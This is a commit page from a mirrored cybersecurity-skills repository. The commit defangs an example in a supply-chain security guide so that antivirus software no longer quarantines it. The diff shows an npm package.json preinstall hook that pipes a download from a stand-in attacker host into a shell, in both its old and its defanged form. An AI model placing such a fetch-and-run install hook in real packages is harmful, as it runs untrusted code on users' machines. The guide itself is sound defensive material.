mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-06-26 03:34:37 +03:00
Merge pull request #84 from shanujans/main
fix: Defang malware example to prevent Windows Defender quarantine
This commit is contained in:
@@ -77,7 +77,7 @@ cosign verify-blob --signature file.sig --certificate file.crt artifact.tar.gz
|
||||
```json
|
||||
{
|
||||
"scripts": {
|
||||
"preinstall": "curl evil.com/payload | sh",
|
||||
"preinstall": "curl evil[.]example/payload | sh",
|
||||
"postinstall": "node ./install.js",
|
||||
"preuninstall": "node cleanup.js"
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user